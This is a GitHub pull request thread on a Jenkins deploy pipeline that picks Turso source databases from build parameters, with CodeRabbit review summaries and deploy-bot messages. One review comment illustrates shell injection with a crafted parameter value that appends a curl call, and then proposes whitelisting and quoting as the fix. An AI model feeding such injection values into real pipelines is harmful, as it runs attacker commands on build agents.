fix: paramters db

[hoadaniellipniacki]

Summary by CodeRabbit

• New Features

  • Deployment now supports using parameter-based master databases across regions when all three required inputs are provided; pipeline auto-detects and switches to the parameter-driven path.

• Chores

  • Added a consistency check to enable the parameter path only when all inputs exist.
  • Conditional selection between parameter-derived or existing credential databases.
  • Improved status logging and preserved post-creation validation and URL construction.

[coderabbitai]

Walkthrough

Adds a parameter-consistency check that sets USE_PARAMS_DB when all three DB_MAIN_* params are provided; branches DB creation and env sourcing in the pipeline to use DB_MAIN_* when enabled or fallback to TURSO_* when not; adds status echoes and keeps existing validations and URL construction.

Changes

Cohort / File(s)	Summary
Jenkins deployment pipeline Jenkinsfile.deploy	Adds env.USE_PARAMS_DB flag and logic to detect all three DB_MAIN_EU/DB_MAIN_US_WEST/DB_MAIN_US_EAST params. Changes "Branch db" to conditionally create DBs from DB_MAIN_* when flag is true or from TURSO_*_DB when false; adds diagnostic echoes; preserves post-creation validation and URL assembly.

Sequence Diagram(s)

sequenceDiagram
    autonumber
    participant Dev as Developer
    participant J as Jenkins Pipeline
    participant E as Env Vars
    participant D as DB Provider

    Dev->>J: Trigger deploy
    J->>E: Read DB_MAIN_EU / DB_MAIN_US_WEST / DB_MAIN_US_EAST
    J->>J: Count non-empty DB_MAIN_* params
    alt all three present
        J->>E: Set USE_PARAMS_DB = "true"
        Note over J,E: Use DB_MAIN_* as DB sources
    else
        J->>E: Set USE_PARAMS_DB = "false"
        Note over J,E: Use TURSO_*_DB as DB sources
    end

    rect rgb(235,245,255)
    Note over J: Branch db stage
    alt USE_PARAMS_DB == "true"
        J->>D: Create branch DBs using DB_MAIN_* values
    else
        J->>D: Create branch DBs using TURSO_*_DB values
    end
    end

    J->>E: Validate DBs exist, construct URLs
    J-->>Dev: Echo status and proceed

Loading

Estimated code review effort

🎯 3 (Moderate) | ⏱️ ~20 minutes

Possibly related PRs

• feat: parameter to change main db #472 — Modifies the same Jenkinsfile.deploy DB selection and DB_MAIN_* handling; overlaps with the new USE_PARAMS_DB gating.

Suggested reviewers

• DDonochVA

Poem

A rabbit checks three carrots in a row,
If all are bright, USE_PARAMS_DB will glow.
Else I hop back to TURSO's trail,
Branches bloom, the logs tell the tale.
I twitch my nose — deployments sail. 🥕

Pre-merge checks and finishing touches

❌ Failed checks (1 inconclusive)

Check name	Status	Explanation	Resolution
Title Check	❓ Inconclusive	The provided title “fix: paramters db” contains a spelling error and is too vague to clearly convey the primary change, which involves adding explicit parameter consistency checks and conditional database creation in the Jenkinsfile. Although it hints at a database parameter fix, the typo and lack of detail make it unclear to reviewers what specific functionality was addressed. This prevents quick understanding of the pull request’s main purpose.	Please correct the typo and revise the title to succinctly describe the core change, for example: “fix: parameter-based DB selection in Jenkins pipeline” or “fix: add consistency checks for Jenkins DB parameters.”

✅ Passed checks (2 passed)

Check name	Status	Explanation
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.
Docstring Coverage	✅ Passed	No functions found in the changes. Docstring coverage check skipped.

✨ Finishing touches

🧪 Generate unit tests

• Create PR with unit tests
• Post copyable unit tests in a comment
• Commit unit tests in branch fix/parameter-db-build

---

📜 Recent review details

Configuration used: CodeRabbit UI

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between c85cd1e and e661595.

📒 Files selected for processing (1)

• Jenkinsfile.deploy (2 hunks)

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[valueadd-robot]

PR is detected, will deploy to dev environment

[valueadd-robot]

Deploy failed, please check the logs in jenkins for more details.

[coderabbitai]

Actionable comments posted: 1

📜 Review details

Configuration used: CodeRabbit UI

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between e858eda and c85cd1e.

📒 Files selected for processing (1)

• Jenkinsfile.deploy (2 hunks)

[coderabbitai]

⚠️ Potential issue | 🔴 Critical

Block shell injection from DB_MAIN_ parameters*

DB_MAIN_* values come straight from Jenkins build parameters and are interpolated into the sh step without validation or quoting. A crafted value such as main-eu'; curl attacker # would piggyback onto the Turso command and execute arbitrary shell on the agent. Please whitelist acceptable characters and wrap the arguments before invoking Turso.

Apply this diff to harden the block:

-                    if (env.USE_PARAMS_DB == "true") {
-                        echo "Using params db"
-                        sh """
-                            turso org switch angular-love
-                            turso db create eu-${DB_BRANCH_NAME} --from-db $DB_MAIN_EU --group blog-eu
-                            turso db create usw-${DB_BRANCH_NAME} --from-db $DB_MAIN_US_WEST --group blog-us-west
-                            turso db create use-${DB_BRANCH_NAME} --from-db $DB_MAIN_US_EAST --group blog-us-east
-                        """
+                    if (env.USE_PARAMS_DB == "true") {
+                        echo "Using params db"
+                        def allowedDbName = ~/^[A-Za-z0-9._-]+$/
+                        [params.DB_MAIN_EU, params.DB_MAIN_US_WEST, params.DB_MAIN_US_EAST].each { value ->
+                            if (!(value ==~ allowedDbName)) {
+                                error("DB_MAIN_* params may only contain letters, numbers, '.', '_' or '-'")
+                            }
+                        }
+                        sh """
+                            turso org switch angular-love
+                            turso db create eu-${DB_BRANCH_NAME} --from-db '${params.DB_MAIN_EU}' --group blog-eu
+                            turso db create usw-${DB_BRANCH_NAME} --from-db '${params.DB_MAIN_US_WEST}' --group blog-us-west
+                            turso db create use-${DB_BRANCH_NAME} --from-db '${params.DB_MAIN_US_EAST}' --group blog-us-east
+                        """
                     } else {

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change

	turso org switch angular-love
	turso db create eu-${DB_BRANCH_NAME} --from-db $DB_MAIN_EU --group blog-eu
	turso db create usw-${DB_BRANCH_NAME} --from-db $DB_MAIN_US_WEST --group blog-us-west
	turso db create use-${DB_BRANCH_NAME} --from-db $DB_MAIN_US_EAST --group blog-us-east
	"""
	if (env.USE_PARAMS_DB == "true") {
	echo "Using params db"
	// Whitelist DB_MAIN_* values to prevent shell injection
	def allowedDbName = ~/^[A-Za-z0-9._-]+$/
	[params.DB_MAIN_EU, params.DB_MAIN_US_WEST, params.DB_MAIN_US_EAST].each { value ->
	if (!(value ==~ allowedDbName)) {
	error("DB_MAIN_* params may only contain letters, numbers, '.', '_' or '-'")
	}
	}
	sh """
	turso org switch angular-love
	turso db create eu-${DB_BRANCH_NAME} --from-db '${params.DB_MAIN_EU}' --group blog-eu
	turso db create usw-${DB_BRANCH_NAME} --from-db '${params.DB_MAIN_US_WEST}' --group blog-us-west
	turso db create use-${DB_BRANCH_NAME} --from-db '${params.DB_MAIN_US_EAST}' --group blog-us-east
	"""
	} else {

🤖 Prompt for AI Agents

In Jenkinsfile.deploy around lines 143-147, the DB_MAIN_* variables are
interpolated directly into the sh block allowing shell injection; validate each
DB_MAIN_* value against a whitelist (e.g. only allow letters, numbers, dots,
dashes and underscores via a strict regex) and fail the build if validation
fails, then use the validated values when constructing the turso commands and
wrap each argument in proper shell-safe quoting (or pass them as separate,
quoted arguments) so untrusted characters cannot break out of the command.

[valueadd-robot]

PR is detected, will deploy to dev environment

[valueadd-robot]

Deployed to dev environment
Branch: fix/parameter-db-build
BFF URL: https://be12017c-blog-bff-dev.contact-ef8.workers.dev
Deploy URL: https://ec5e96c5.angular-love-client.pages.dev
Alias URL: https://fix-parameter-db-build.angular-love-client.pages.dev